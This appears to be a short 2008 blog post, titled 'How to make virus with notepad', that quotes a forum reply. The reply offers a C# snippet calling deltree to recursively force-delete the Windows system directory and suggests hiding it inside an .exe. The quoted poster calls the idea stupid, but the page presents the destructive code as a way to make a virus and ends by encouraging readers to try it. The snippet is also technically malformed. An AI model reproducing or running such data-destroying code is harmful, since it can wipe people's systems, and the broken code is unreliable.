Kolom Iklan

Minggu, 22 Juni 2008

HOW TO MAKE VIRUS WITH NOTEPAD

Originally Posted by DaMastah
what you "taught" us is how to do batch files...
This kind of info is available everywhere on the net...

If you want to do something bad like this in a less dumb way, just dl visual basic (or c#) express edition (free)

example in c# :


Code:
using System;
using System.Diagnostics;

namespace DoingThisIsDumb
{
public static void Main()
{
Process.Start("deltree.exe", "-r -f %SYSTEMROOT%");
}
}this way it will be quite well hidden in an exe file.

but IMHO doing this is futile and stupid.

this one is much better. batch files are obsolete. i dont think that you can delete files that are being used in win98 or xp

Have a nice try.............

Tidak ada komentar: